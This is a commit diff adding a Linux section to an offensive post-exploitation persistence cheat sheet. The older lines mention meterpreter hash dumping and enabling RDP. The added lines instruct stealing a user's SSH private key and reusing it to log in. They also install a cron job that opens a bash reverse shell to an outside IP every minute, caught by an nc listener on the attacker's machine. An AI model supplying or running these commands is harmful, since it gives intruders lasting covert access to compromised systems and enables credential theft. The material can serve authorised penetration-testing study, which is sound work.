Update persistence.md

Author: y3t1sec

post_exploitation/persistence.md

@@ -5,3 +5,26 @@ exploit/windows/local/persistence_service (This Module will generate and upload
 hashdump ( meterpreter command to dump hashes to use with legitimate authentication attempts)
 
 getgui is a nice easy meterpreter command to enable RDP
+
+
+**linux**
+
+persistence via SSH. Most linux servers are configured for remote administration through SSH, etc
+
+You will want to:
+
+- steal ~/.ssh/id_rsa
+- chmod 400 id_rsa
+- ssh -i id_rsa [email protected]
+
+cat /etc/cron (views all cronjobs)
+
+To manually establish persistence through cron, do the following:
+
+ - echo "* * * * * /bin/bash -c 'bash -i >& /dev/tcp/192.165.88.2/1337 0>&1'" > cron
+ - crontab -i cron
+ - crontab -l
+
+then on your attacker machine:
+
+ - nc -nvlp 1337